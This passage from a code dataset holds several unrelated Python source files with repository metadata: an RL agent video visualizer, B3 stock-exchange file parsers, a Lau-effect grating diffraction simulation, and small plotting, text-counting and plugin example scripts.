os.path.join(selected_snapshot_dir, network_name + \".pt\")\r\n agent.__dict__[network_name] = torch.load(load_path ,map_location=util.device)\r\n\r\n@click.command(context_settings=dict(\r\n ignore_unknown_options=True,\r\n allow_extra_args=True,)\r\n)\r\n@click.argument(\"algo_name\", type=str) # Name of the algorithm, should be in the AGENT_MODULE_MAPPING global variable\r\n@click.argument(\"log_dir\", type=str) # Path of the log directory\r\n@click.argument(\"config-path\", type=str) # Config path\r\n@click.option(\"--gpu\", type=int, default=-1) # Device to load agent, -1 for cpu, >=0 for CUDA gpu\r\n@click.argument('args', nargs=-1)\r\ndef main(algo_name, log_dir, config_path, gpu, args):\r\n #set device\r\n set_device_and_logger(gpu, None)\r\n\r\n #load config and parameters\r\n params = load_params(log_dir)\r\n config = load_config(config_path, args)\r\n\r\n #load env\r\n env_name = params['env_name']\r\n env = get_env(env_name)\r\n obs_space = env.observation_space\r\n action_space = env.action_space\r\n\r\n #load agent\r\n agent_name = algo_name.upper() + \"Agent\"\r\n agent_module = importlib.import_module(AGENT_MODULE_MAPPING[algo_name],package=algo_name+\".agent\")\r\n agent_class = getattr(agent_module, agent_name)\r\n agent = agent_class(obs_space, action_space, **params['agent'])\r\n \r\n #load model\r\n load_snapshot(agent, env, log_dir, config)\r\n\r\n #save video demo\r\n\r\n #select the best traj from trials\r\n traj_imgs = []\r\n num_trials = config['num_trials']\r\n best_ret = -10000000000\r\n for trial in range(num_trials):\r\n imgs, traj_ret = itemgetter(\"imgs\",\"ret\")(rollout(agent, env, ret_imgs=True, **config))\r\n if traj_ret > best_ret:\r\n traj_imgs = imgs\r\n best_ret = traj_ret\r\n \r\n # write imgs to video\r\n output_dir = config['output_dir']\r\n output_path = os.path.join(output_dir, \"{}_{}_{}.mp4\".format(algo_name, env_name, int(best_ret)))\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n video_size = (config['width'], config['height'])\r\n fps = config['fps']\r\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\r\n video_writer = cv2.VideoWriter(output_path, fourcc, fps, video_size)\r\n for img in traj_imgs:\r\n 
video_writer.write(img)\r\n video_writer.release()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"x35f/unstable_baselines","sub_path":"tools/visualizer/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"31"} +{"seq_id":"44851737190","text":"\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nF = \"BJ721E05W-J11@9=person_whole_front_depth\"\n\ndata = np.load(f\"data/depth/{F}.npy\")\nplt.imshow(data)\nplt.colorbar()\nfig = plt.gcf()\nHEIGHT, WIDTH = 512, 320\nfig.set_size_inches(WIDTH/50, HEIGHT/50)\nplt.savefig(f\"data/depth/demo-{F}.png\")\n","repo_name":"aspfohl/deeep-learning","sub_path":"data/depth/viz_depth.py","file_name":"viz_depth.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32912799050","text":"\nimport json\nfrom itertools import groupby\n\nimport pandas as pd\nfrom lxml import etree\n\nfrom . import PortugueseRulesParser2, read_fwf, FWFFile, FWFRow, Field, DateField, NumericField\n\nclass TaxaSwap:\n widths = [6, 3, 2, 8, 2, 5, 15, 5, 5, 1, 14, 1, 5]\n colnames = [\n 'id_transacao',\n 'compl_transacao',\n 'tipo_registro',\n 'data_geracao_arquivo',\n 'cod_curvas',\n 'cod_taxa',\n 'desc_taxa',\n 'num_dias_corridos',\n 'num_dias_saques',\n 'sinal_taxa',\n 'taxa_teorica',\n 'carat_vertice',\n 'cod_vertice'\n ]\n\n def __init__(self, fname):\n with open(fname, 'r') as fp:\n rawdata = fp.read()\n self.__data = read_fwf(rawdata.split('\\n'), self.widths, self.colnames, parse_fun=self._parse)\n self.__findata = [self._build_findata(list(v)) for k, v in groupby(self.__data, key=lambda x: x['cod_taxa'])]\n \n def _parse(self, obj):\n obj['data_geracao_arquivo'] = '{}-{}-{}'.format(obj['data_geracao_arquivo'][:4], obj['data_geracao_arquivo'][4:6], obj['data_geracao_arquivo'][6:])\n obj['num_dias_corridos'] = int(obj['num_dias_corridos'])\n obj['num_dias_saques'] = int(obj['num_dias_saques'])\n obj['sinal_taxa'] = 1 if obj['sinal_taxa'] == '+' else -1\n obj['taxa_teorica'] = float(obj['taxa_teorica'])/1e7\n return obj\n\n def _build_findata(self, lst):\n taxa_teorica = [obj['taxa_teorica']*obj['sinal_taxa'] for obj in lst]\n num_dias_corridos = [obj['num_dias_corridos'] for obj in lst]\n num_dias_saques = [obj['num_dias_saques'] for obj in lst]\n carat_vertice = [obj['carat_vertice'] for obj in lst]\n keys = ('current_days', 'business_days', 'type', 'value')\n terms = [dict(zip(keys, x)) for x in zip(num_dias_corridos, num_dias_saques, carat_vertice, taxa_teorica)]\n\n return {\n 'refdate': lst[0]['data_geracao_arquivo'],\n 'id': lst[0]['cod_taxa'],\n 'name': lst[0]['cod_curvas'],\n 'description': lst[0]['desc_taxa'],\n 'terms': terms\n }\n\n @property\n def data(self):\n return self.__data\n\n @property\n def findata(self):\n return self.__findata\n\n\nclass CDIIDI:\n def __init__(self, fname):\n self.fname = fname\n self.parse()\n\n def parse(self):\n text_parser = PortugueseRulesParser2()\n with open(self.fname, 'r') as fp:\n _data = json.loads(fp.read())\n cdi_data = {\n 'refdate': text_parser.parse(_data['dataTaxa']),\n 'value': text_parser.parse(_data['taxa']),\n 'symbol': 'CDI'\n }\n idi_data = {\n 'refdate': text_parser.parse(_data['dataIndice']),\n 'value': text_parser.parse(_data['indice']),\n 'symbol': 'IDI'\n }\n self._info = [cdi_data, idi_data]\n self._data = pd.DataFrame(self._info)\n\n @property\n def 
data(self):\n return self._data\n\n\nclass BVBG028:\n ATTRS = {\n 'header': {\n 'trade_date': 'RptParams/RptDtAndTm/Dt',\n 'security_id': 'FinInstrmId/OthrId/Id',\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/OthrId/PlcOfListg/MktIdrCd',\n 'instrument_asset': 'FinInstrmAttrCmon/Asst',\n 'instrument_asset_description': 'FinInstrmAttrCmon/AsstDesc',\n 'instrument_market': 'FinInstrmAttrCmon/Mkt',\n 'instrument_segment': 'FinInstrmAttrCmon/Sgmt',\n 'instrument_description': 'FinInstrmAttrCmon/Desc'\n },\n 'EqtyInf': {\n 'security_category': 'InstrmInf/EqtyInf/SctyCtgy',\n 'isin': 'InstrmInf/EqtyInf/ISIN',\n 'distribution_id': 'InstrmInf/EqtyInf/DstrbtnId',\n 'cfi_code': 'InstrmInf/EqtyInf/CFICd',\n 'specification_code': 'InstrmInf/EqtyInf/SpcfctnCd',\n 'corporation_name': 'InstrmInf/EqtyInf/CrpnNm',\n 'symbol': 'InstrmInf/EqtyInf/TckrSymb',\n 'payment_type': 'InstrmInf/EqtyInf/PmtTp',\n 'allocation_lot_size': 'InstrmInf/EqtyInf/AllcnRndLot',\n 'price_factor': 'InstrmInf/EqtyInf/PricFctr',\n 'trading_start_date': 'InstrmInf/EqtyInf/TradgStartDt',\n 'trading_end_date': 'InstrmInf/EqtyInf/TradgEndDt',\n 'corporate_action_start_date': 'InstrmInf/EqtyInf/CorpActnStartDt',\n 'ex_distribution_number': 'InstrmInf/EqtyInf/EXDstrbtnNb',\n 'custody_treatment_type': 'InstrmInf/EqtyInf/CtdyTrtmntTp',\n 'trading_currency': 'InstrmInf/EqtyInf/TradgCcy',\n 'market_capitalisation': 'InstrmInf/EqtyInf/MktCptlstn',\n 'last_price': 'InstrmInf/EqtyInf/LastPric',\n 'first_price': 'InstrmInf/EqtyInf/FrstPric',\n 'governance_indicator': 'InstrmInf/EqtyInf/GovnInd',\n 'days_to_settlement': 'InstrmInf/EqtyInf/DaysToSttlm',\n 'right_issue_price': 'InstrmInf/EqtyInf/RghtsIssePric',\n },\n 'OptnOnEqtsInf': {\n 'security_category': 'InstrmInf/OptnOnEqtsInf/SctyCtgy',\n 'isin': 'InstrmInf/OptnOnEqtsInf/ISIN',\n 'symbol': 'InstrmInf/OptnOnEqtsInf/TckrSymb',\n 'exercise_price': 'InstrmInf/OptnOnEqtsInf/ExrcPric',\n 'option_style': 'InstrmInf/OptnOnEqtsInf/OptnStyle',\n 'expiration_date': 'InstrmInf/OptnOnEqtsInf/XprtnDt',\n 'option_type': 'InstrmInf/OptnOnEqtsInf/OptnTp',\n 'underlying_security_id': 'InstrmInf/OptnOnEqtsInf/UndrlygInstrmId/OthrId/Id',\n 'underlying_security_proprietary': 'InstrmInf/OptnOnEqtsInf/UndrlygInstrmId/OthrId/Tp/Prtry',\n 'underlying_security_market': 'InstrmInf/OptnOnEqtsInf/UndrlygInstrmId/OthrId/PlcOfListg/MktIdrCd',\n 'protection_flag': 'InstrmInf/OptnOnEqtsInf/PrtcnFlg',\n 'premium_upfront_indicator': 'InstrmInf/OptnOnEqtsInf/PrmUpfrntInd',\n 'trading_start_date': 'InstrmInf/OptnOnEqtsInf/TradgStartDt',\n 'trading_end_date': 'InstrmInf/OptnOnEqtsInf/TradgEndDt',\n 'payment_type': 'InstrmInf/OptnOnEqtsInf/PmtTp',\n 'allocation_lot_size': 'InstrmInf/OptnOnEqtsInf/AllcnRndLot',\n 'price_factor': 'InstrmInf/OptnOnEqtsInf/PricFctr',\n 'trading_currency': 'InstrmInf/OptnOnEqtsInf/TradgCcy',\n 'days_to_settlement': 'InstrmInf/OptnOnEqtsInf/DaysToSttlm',\n 'delivery_type': 'InstrmInf/OptnOnEqtsInf/DlvryTp',\n 'automatic_exercise_indicator': 'InstrmInf/OptnOnEqtsInf/AutomtcExrcInd',\n },\n 'FutrCtrctsInf': {\n 'security_category': 'InstrmInf/FutrCtrctsInf/SctyCtgy',\n 'expiration_date': 'InstrmInf/FutrCtrctsInf/XprtnDt',\n 'symbol': 'InstrmInf/FutrCtrctsInf/TckrSymb',\n 'expiration_code': 'InstrmInf/FutrCtrctsInf/XprtnCd',\n 'trading_start_date': 'InstrmInf/FutrCtrctsInf/TradgStartDt',\n 'trading_end_date': 'InstrmInf/FutrCtrctsInf/TradgEndDt',\n 'value_type_code': 'InstrmInf/FutrCtrctsInf/ValTpCd',\n 'isin': 'InstrmInf/FutrCtrctsInf/ISIN',\n 'cfi_code': 
'InstrmInf/FutrCtrctsInf/CFICd',\n            'delivery_type': 'InstrmInf/FutrCtrctsInf/DlvryTp',\n            'payment_type': 'InstrmInf/FutrCtrctsInf/PmtTp',\n            'contract_multiplier': 'InstrmInf/FutrCtrctsInf/CtrctMltplr',\n            'asset_settlement_indicator': 'InstrmInf/FutrCtrctsInf/AsstQtnQty',\n            'allocation_lot_size': 'InstrmInf/FutrCtrctsInf/AllcnRndLot',\n            'trading_currency': 'InstrmInf/FutrCtrctsInf/TradgCcy',\n            'underlying_security_id': 'InstrmInf/FutrCtrctsInf/UndrlygInstrmId/OthrId/Id',\n            'underlying_security_proprietary': 'InstrmInf/FutrCtrctsInf/UndrlygInstrmId/OthrId/Tp/Prtry',\n            'underlying_security_market': 'InstrmInf/FutrCtrctsInf/UndrlygInstrmId/OthrId/PlcOfListg/MktIdrCd',\n            'withdrawal_days': 'InstrmInf/FutrCtrctsInf/WdrwlDays',\n            'working_days': 'InstrmInf/FutrCtrctsInf/WrkgDays',\n            'calendar_days': 'InstrmInf/FutrCtrctsInf/ClnrDays',\n        }\n    }\n\n    def __init__(self, fname):\n        self.fname = fname\n        self.instruments = []\n        self.missing = set()\n        self.parse()\n\n    def parse(self):\n        with open(self.fname, 'rb') as fp:\n            tree = etree.parse(fp)\n        exchange = tree.getroot()[0][0]\n        ns = {None: 'urn:bvmf.052.01.xsd'}\n        td_xpath = etree.ETXPath('//{urn:bvmf.052.01.xsd}BizGrpDtls')\n        td = td_xpath(exchange)\n        if len(td) > 0:\n            self.creation_date = td[0].find('CreDtAndTm', ns).text[:10]\n        else:\n            raise Exception('Invalid XML: tag BizGrpDtls not found')\n\n        xs = exchange.findall(\n            '{urn:bvmf.052.01.xsd}BizGrp/{urn:bvmf.100.02.xsd}Document/{urn:bvmf.100.02.xsd}Instrm')\n        for node in xs:\n            self.parse_instrument_node(node)\n\n    def parse_instrument_node(self, node):\n        data = {'creation_date': self.creation_date}\n        ns = {None: 'urn:bvmf.100.02.xsd'}\n        for attr in self.ATTRS['header']:\n            els = node.findall(self.ATTRS['header'][attr], ns)\n            if len(els):\n                data[attr] = els[0].text.strip()\n        elm = node.findall('InstrmInf', ns)[0]\n        # remove ns {urn:bvmf.100.02.xsd} = 21 chars\n        tag = elm.getchildren()[0].tag[21:]\n        if self.ATTRS.get(tag) is None:\n            self.missing.add(tag)\n            return\n        for attr in self.ATTRS[tag]:\n            els = node.findall(self.ATTRS[tag][attr], ns)\n            if len(els):\n                data[attr] = els[0].text.strip()\n        data['instrument_type'] = tag\n        self.instruments.append(data)\n\n    @property\n    def data(self):\n        return self.instruments\n\n\nclass BVBG086:\n    def __init__(self, fname):\n        self.fname = fname\n        self.instruments = []\n        self.missing = set()\n        self.parse()\n\n    def parse(self):\n        with open(self.fname, 'rb') as fp:\n            tree = etree.parse(fp)\n        exchange = tree.getroot()[0][0]\n        ns = {None: 'urn:bvmf.052.01.xsd'}\n        td_xpath = etree.ETXPath('//{urn:bvmf.052.01.xsd}BizGrpDtls')\n        td = td_xpath(exchange)\n        if len(td) > 0:\n            self.creation_date = td[0].find('CreDtAndTm', ns).text[:10]\n        else:\n            raise Exception('Invalid XML: tag BizGrpDtls not found')\n\n        xs = exchange.findall(\n            '{urn:bvmf.052.01.xsd}BizGrp/{urn:bvmf.217.01.xsd}Document/{urn:bvmf.217.01.xsd}PricRpt')\n        for node in xs:\n            self.parse_price_report_node(node)\n\n    def parse_price_report_node(self, node):\n        attrs = {\n            'trade_date': 'TradDt/Dt',\n            'symbol': 'SctyId/TckrSymb',\n            'security_id': 'FinInstrmId/OthrId/Id',  # SecurityId\n            'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n            'security_market': 'FinInstrmId/PlcOfListg/MktIdrCd',\n            'trade_quantity': 'TradDtls/TradQty',  # Trades\n            'volume': 'FinInstrmAttrbts/NtlFinVol',\n            'open_interest': 'FinInstrmAttrbts/OpnIntrst',\n            'traded_contracts': 'FinInstrmAttrbts/FinInstrmQty',\n            'best_ask_price': 'FinInstrmAttrbts/BestAskPric',\n            'best_bid_price': 'FinInstrmAttrbts/BestBidPric',\n            'first_price': 'FinInstrmAttrbts/FrstPric',\n            'min_price': 'FinInstrmAttrbts/MinPric',\n            'max_price': 'FinInstrmAttrbts/MaxPric',\n            'average_price': 'FinInstrmAttrbts/TradAvrgPric',\n            'last_price': 'FinInstrmAttrbts/LastPric',\n            # Trades in the regular session\n            'regular_transactions_quantity': 'FinInstrmAttrbts/RglrTxsQty',\n            # Contracts in the regular session\n            'regular_traded_contracts': 'FinInstrmAttrbts/RglrTraddCtrcts',\n            # Financial volume in the regular session\n            'regular_volume': 'FinInstrmAttrbts/NtlRglrVol',\n            # Trades in the non-regular session\n            'nonregular_transactions_quantity': 'FinInstrmAttrbts/NonRglrTxsQty',\n            # Contracts in the non-regular session\n            'nonregular_traded_contracts': 'FinInstrmAttrbts/NonRglrTraddCtrcts',\n            # Financial volume in the non-regular session\n            'nonregular_volume': 'FinInstrmAttrbts/NtlNonRglrVol',\n            'oscillation_percentage': 'FinInstrmAttrbts/OscnPctg',\n            'adjusted_quote': 'FinInstrmAttrbts/AdjstdQt',\n            'adjusted_tax': 'FinInstrmAttrbts/AdjstdQtTax',\n            'previous_adjusted_quote': 'FinInstrmAttrbts/PrvsAdjstdQt',\n            'previous_adjusted_tax': 'FinInstrmAttrbts/PrvsAdjstdQtTax',\n            'variation_points': 'FinInstrmAttrbts/VartnPts',\n            'adjusted_value_contract': 'FinInstrmAttrbts/AdjstdValCtrct',\n        }\n        ns = {None: 'urn:bvmf.217.01.xsd'}\n        data = {'creation_date': self.creation_date}\n        for attr in attrs:\n            els = node.findall(attrs[attr], ns)\n            if len(els):\n                data[attr] = els[0].text\n        self.instruments.append(data)\n\n    @property\n    def data(self):\n        return self.instruments\n\n\nclass COTAHIST_header(FWFRow):\n    _pattern = r'^00'\n    tipo_registro = Field(2)\n    nome_arquivo = Field(13)\n    cod_origem = Field(8)\n    data_geracao_arquivo = DateField(8, '%Y%m%d')\n    reserva = Field(214)\n\n\nclass COTAHIST_trailer(FWFRow):\n    _pattern = r'^99'\n    tipo_mercado = Field(2)\n    nome_arquivo = Field(13)\n    cod_origem = Field(8)\n    data_geracao_arquivo = DateField(8, '%Y%m%d')\n    num_registros = Field(11)\n    reserva = Field(203)\n\n\nclass COTAHIST_histdata(FWFRow):\n    _pattern = '^01'\n    tipo_registro = Field(2)\n    data_referencia = DateField(8, '%Y%m%d')\n    cod_bdi = Field(2)\n    cod_negociacao = Field(12)\n    tipo_mercado = Field(3)\n    nome_empresa = Field(12)\n    especificacao = Field(10)\n    num_dias_mercado_termo = Field(3)\n    cod_moeda = Field(4)\n    preco_abertura = NumericField(13, dec=2)\n    preco_max = NumericField(13, dec=2)\n    preco_min = NumericField(13, dec=2)\n    preco_med = NumericField(13, dec=2)\n    preco_ult = NumericField(13, dec=2)\n    preco_melhor_oferta_compra = NumericField(13, dec=2)\n    preco_melhor_oferta_venda = NumericField(13, dec=2)\n    qtd_negocios = NumericField(5)\n    qtd_titulos_negociados = NumericField(18)\n    volume_titulos_negociados = NumericField(18, dec=2)\n    preco_exercicio = NumericField(13, dec=2)\n    indicador_correcao_preco_exercicio = Field(1)\n    data_vencimento = DateField(8, '%Y%m%d')\n    fator_cot = NumericField(7, dec=2)\n    preco_exercicio_pontos = NumericField(13, dec=6)\n    cod_isin = Field(12)\n    num_dist = Field(3)\n\n\nclass COTAHIST_file(FWFFile):\n    header = COTAHIST_header()\n    trailer = COTAHIST_trailer()\n    data = COTAHIST_histdata()\n\n\nclass COTAHIST:\n    def __init__(self, fname):\n        self.fname = fname\n        self._data = None\n        self.parse()\n\n    def parse(self):\n        self._data = COTAHIST_file(self.fname, encoding='latin1')\n\n    @property\n    def data(self):\n        return self._data.data\n\n    @property\n    def header(self):\n        return self._data.header\n\n    @property\n    def trailer(self):\n        return self._data.trailer\n\n\ndef smart_find(node, x, ns):\n    try:\n        return node.find(x, ns).text\n    except AttributeError:\n        return None\n\n\nclass 
BVBG087:\n ATTRS = {\n 'IndxInf': {\n 'ticker_symbol': 'SctyInf/SctyId/TckrSymb',\n 'security_id': 'SctyInf/FinInstrmId/OthrId/Id',\n 'security_proprietary': 'SctyInf/FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'SctyInf/FinInstrmId/PlcOfListg/MktIdrCd',\n 'asset_desc': 'AsstDesc',\n 'settlement_price': 'SttlmVal',\n 'open_price': 'SctyInf/OpngPric',\n 'min_price': 'SctyInf/MinPric',\n 'max_price': 'SctyInf/MaxPric',\n 'average_price': 'SctyInf/TradAvrgPric',\n 'close_price': 'SctyInf/ClsgPric',\n 'last_price': 'SctyInf/IndxVal',\n 'oscillation_val': 'SctyInf/OscnVal',\n 'rising_shares_number': 'RsngShrsNb',\n 'falling_shares_number': 'FlngShrsNb',\n 'stable_shares_number': 'StblShrsNb'\n },\n 'IOPVInf': {\n 'ticker_symbol': 'SctyId/TckrSymb',\n 'security_id': 'FinInstrmId/OthrId/Id',\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/PlcOfListg/MktIdrCd',\n 'open_price': 'OpngPric',\n 'min_price': 'MinPric',\n 'max_price': 'MaxPric',\n 'average_price': 'TradAvrgPric',\n 'close_price': 'ClsgPric',\n 'last_price': 'IndxVal',\n 'oscillation_val': 'OscnVal',\n },\n 'BDRInf': {\n 'ticker_symbol': 'SctyId/TckrSymb',\n 'security_id': 'FinInstrmId/OthrId/Id',\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/PlcOfListg/MktIdrCd',\n 'ref_price': 'RefPric',\n }\n }\n\n def __init__(self, fname):\n self.fname = fname\n self.indexes = []\n self.parse()\n\n def parse(self):\n with open(self.fname, 'rb') as fp:\n tree = etree.parse(fp)\n\n ns = {None: 'urn:bvmf.218.01.xsd'}\n exchange = tree.getroot()[0][0]\n\n td_xpath = etree.ETXPath('//{urn:bvmf.218.01.xsd}TradDt')\n td = td_xpath(exchange)\n if len(td) > 0:\n trade_date = td[0].find('Dt', ns).text\n else:\n raise Exception('Invalid XML: tag TradDt not found')\n\n for tag in self.ATTRS:\n fields = self.ATTRS[tag]\n _xpath = etree.ETXPath('//{urn:bvmf.218.01.xsd}%s' % tag)\n for node in _xpath(exchange):\n data = {\n 'trade_date': trade_date,\n 'index_type': tag\n }\n for k in fields:\n data[k] = smart_find(node, fields[k], ns)\n self.indexes.append(data)\n\n @property\n def data(self):\n return self.indexes\n\n\nclass StockIndexInfo:\n def __init__(self, fname):\n self.fname = fname\n self._table = None\n self.parse()\n\n def parse(self):\n with open(self.fname) as fp:\n self._data = json.loads(fp.read())\n\n df = pd.DataFrame(self._data['results'])\n\n def _(dfx):\n indexes = dfx['indexes'].str.split(',').explode()\n return pd.DataFrame({\n 'company': dfx['company'],\n 'spotlight': dfx['spotlight'],\n 'code': dfx['code'],\n 'indexes': indexes,\n })\n\n dfr = (df.groupby(['company', 'spotlight', 'code'])\n .apply(_)\n .reset_index(drop=True))\n\n dfr['refdate'] = self._data['header']['update']\n dfr['duration_start_month'] = self._data['header']['startMonth']\n dfr['duration_end_month'] = self._data['header']['endMonth']\n dfr['duration_year'] = self._data['header']['year']\n\n dfr = dfr.rename(columns={\n 'company': 'corporation_name',\n 'spotlight': 'specification_code',\n 'code': 'symbol'\n })\n\n self._table = dfr\n\n @property\n def data(self):\n return self._table","repo_name":"datalab42/kyd","sub_path":"kyd/parsers/b3.py","file_name":"b3.py","file_ext":"py","file_size_in_byte":19365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7559535602","text":"sentence = input(\"Enter your sentence here - \")\nlength = len(sentence)\nnumbers = 0\nletters = 0\nspace = 0\nrandom = 0\nfor i in sentence:\n if 
i.isalpha():\n        letters += 1\n    elif i.isnumeric():\n        numbers += 1\n    elif i.isspace():\n        space += 1\n    else:\n        random += 1\nprint(\"Letters in sentence are - \",letters)\nprint(\"Numbers in sentence are - \",numbers)\nprint(\"Spaces in sentence are - \",space)\nprint(\"Other characters in sentence are - \",random)","repo_name":"SnehaMishra28/Python-DeepLearning_Fall2018","sub_path":"Mod1_ICP1/Source/part-1/ICP1(3).py","file_name":"ICP1(3).py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"42187835569","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom os.path import abspath\nfrom pluginplot import Plugin\n\ndef main():\n    plugin = Plugin(folder=abspath('plugins'))\n    plugin.register_plots()\n\n    content = \"This is test message\"\n    encoded = plugin.apply_filter('encode', content)\n    decoded = plugin.apply_filter('decode', encoded)\n\n    plugin.do_action('out_html', encoded, decoded)\n    plugin.do_action('out_json', {\n        'encoded': encoded,\n        'decoded': decoded\n    })\n\nif __name__ == '__main__':\n    main()\n","repo_name":"zeuxisoo/python-pluginplot","sub_path":"examples/plots/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
+{"seq_id":"9088550427","text":"# Lau effect for a grating using analytical solution\n\n# Assuming plane wave\n# More accurate results with lower angle sampling interval\n# High computational cost\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom optwavepckg import OptWave\nfrom optwavepckg.utils import normalize, intensity\n\n'''\n    Fourier coefficients of binary amplitude grating (An).\n\n    Parameters:\n        - n (int): coefficient order\n        - f (double): opening fraction / duty cycle / fill factor\n'''\ndef fourier_coef_amp_gr(n, f):\n    if n == 0:\n        return f\n    else:\n        return np.sin(n*np.pi*f)/(n*np.pi)\n\n'''\n    Fourier coefficients of sine grating\n    T(x) = 1/2 + 1/2 * cos(2*pi*x/P)\n\n    Parameters:\n        - n (int): coefficient order\n'''\ndef fourier_coef_sin_gr(n):\n    if n == 0:\n        return 1/2\n    elif abs(n) == 1:\n        return 1/4\n    else:\n        return 0\n\n'''\n    Fourier coefficients of binary phase grating\n\n    T(x) = exp(-j*phi*G), where G = binary amplitude grating\n\n    Parameters:\n        - n (int): coefficient order\n        - f (double): fill factor\n        - phi (double): phase\n'''\ndef fourier_coef_phase_gr(n, f, phi):\n    if n == 0:\n        return 1 - f + f * np.exp(-1j*phi)\n    else:\n        a = np.exp(-1j*phi) - 1\n        b = n*np.pi\n        return a*np.sin(b*f)/b\n\n'''\n    Fourier coefficient for a given grating\n\n    Parameters:\n        - n (int): coefficient order\n        - kind (string): grating type - 'amplitude', 'phase', 'sine'\n        - params (dictionary): grating parameters\n            - f (double): duty cycle (amp/phase gr)\n            - phi (double): phase (phase gr)\n'''\ndef get_fourier_coef(n, kind, params):\n    if kind == 'amplitude':\n        An = fourier_coef_amp_gr(n, params[\"f\"])\n    elif kind == 'phase':\n        An = fourier_coef_phase_gr(n, params[\"f\"], params[\"phi\"])\n    elif kind == 'sine':\n        An = fourier_coef_sin_gr(n)\n    return An\n\n'''\n    Wave after 1 grating\n    Included for testing purposes\n\n    Parameters:\n        - x (numpy.array): x-space\n        - wvl: wavelength\n        - theta: wave angle of incidence (w.r.t normal of grating)\n        - z: propagation distance between grating and observation plane\n        - p: grating period\n        - nmax: maximum order for fourier series of grating\n        - kind: grating type - 'amplitude', 'phase', 'sine'\n        - grparams: (optional parameters)\n            - f (double): fill factor for amp and phase gr\n            - phi (double): phase for phase gr\n'''\ndef lau_wave_1gr(x, wvl, theta, z, p, nmax, kind, **grparams):\n    u = np.zeros_like(x, dtype=complex)\n\n    k = 2 * np.pi / wvl\n    kp = 2 * np.pi / p\n    kth = k * np.sin(theta)\n\n    for n in range(-nmax,nmax+1):\n        An = get_fourier_coef(n, kind, grparams)\n        phase = np.exp(1j*(kth+n*kp)*x + 1j*(k-(kth+n*kp)**2/(2*k))*z)\n        u += An * phase\n\n    return u\n\n'''\n    Wave after 2 gratings.\n    Assuming both gratings are equal\n\n    Parameters:\n        - x (numpy.array): x-space\n        - wvl: wavelength\n        - theta: wave angle of incidence (w.r.t normal of grating)\n        - L1: propagation distance between first and second grating\n        - L2: propagation distance between second grating and observation plane\n        - p: grating period\n        - nmax: maximum order for fourier series of grating\n        - kind: grating type - 'amplitude', 'phase', 'sine'\n        - grparams: (optional parameters)\n            - f (double): fill factor for amp and phase gr\n            - phi (double): phase for phase gr\n'''\ndef lau_wave_2gr(x, wvl, theta, L1, L2, p, nmax, kind, **grparams):\n    u = np.zeros_like(x, dtype=complex)\n\n    k = 2 * np.pi / wvl\n    kp = 2 * np.pi / p\n    kth = k * np.sin(theta)\n\n    for n in range(-nmax,nmax+1):\n        An = get_fourier_coef(n, kind, grparams)\n        if An==0:\n            continue\n\n        phase1 = np.exp(-1j*(kth+n*kp)**2*L1/(2*k))\n\n        uaux = np.zeros_like(u, dtype=complex)\n        for m in range(-nmax, nmax+1):\n            Am = get_fourier_coef(m, kind, grparams)\n            if Am==0:\n                continue\n            phase2 = np.exp(1j*(kth+(n+m)*kp)*x)\n            phase3 = np.exp(-1j*(kth+(n+m)*kp)**2*L2/(2*k))\n            uaux += Am * phase2 * phase3\n\n        u += An * phase1 * uaux\n\n    return u\n\n# -------------------------------\n\n# Sim parameters\nN = 10000 # number of points\nL = 20e-3 # grid size\nwvl = 589e-9 # wavelength\nP = 200e-6 # grating period\n\nz_talbot = 2*P**2/wvl\n\nkind = 'amplitude'\nf = 0.1 # grating duty cycle\nphi = np.pi\n\nL1 = z_talbot/2\nL2 = L1\nnmax = 20 # maximum order for grating fourier series\n\nangles = np.linspace(-0.05, 0.05, 51)\n\nx = np.arange(-N//2, N//2)*(L/N)\n\n# Plot intensity pattern\n\nI = np.zeros_like(x)\n\nfor ang in angles:\n    print(\"angle: {}\".format(ang))\n    u = lau_wave_2gr(x, wvl, ang, L1, L2, P, nmax, kind=kind, f=f, phi=phi)\n    I += intensity(u)\n\nI = normalize(I)\n\n# Grating pattern for reference\nwave = OptWave(N,L,wvl)\nwave.planeWave()\nwave.rectAmplitudeGrating(P, f)\nplt.plot(wave.x, intensity(normalize(wave.U)))\n\nplt.plot(x, I)\nplt.xlim(-500e-6, 500e-6)\nplt.xlabel(\"x [m]\")\nplt.ylabel(\"Intensity [arbitrary units]\")\nplt.show()\n","repo_name":"RogerSG11/TFG-moire-interferometry","sub_path":"optical_wave_diffraction/lau_analytical.py","file_name":"lau_analytical.py","file_ext":"py","file_size_in_byte":5324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"14774540622","text":"import viz_utils\nimport torch\nfrom collections import defaultdict\nimport numpy as np\nNUM_TYPE_SKILLS = 3\nMAX_T = {'parking':25}\n\ndef entropy_actions(action_list):\n    change_action = 0\n    curr_action = action_list[0]\n    for a in action_list:\n        if(curr_action != a):\n            change_action += 1\n            curr_action = a\n    return change_action / len(action_list)\n\ndef entropy_rewards(reward_list):\n    return reward_list[-1]\n\ndef score_episode(args_dict, action_list, reward_list):\n    if(args_dict[\"env_name\"] == \"lunar\"):\n        return entropy_actions(action_list)\n    elif(args_dict[\"env_name\"] == \"parking\"):\n        return 
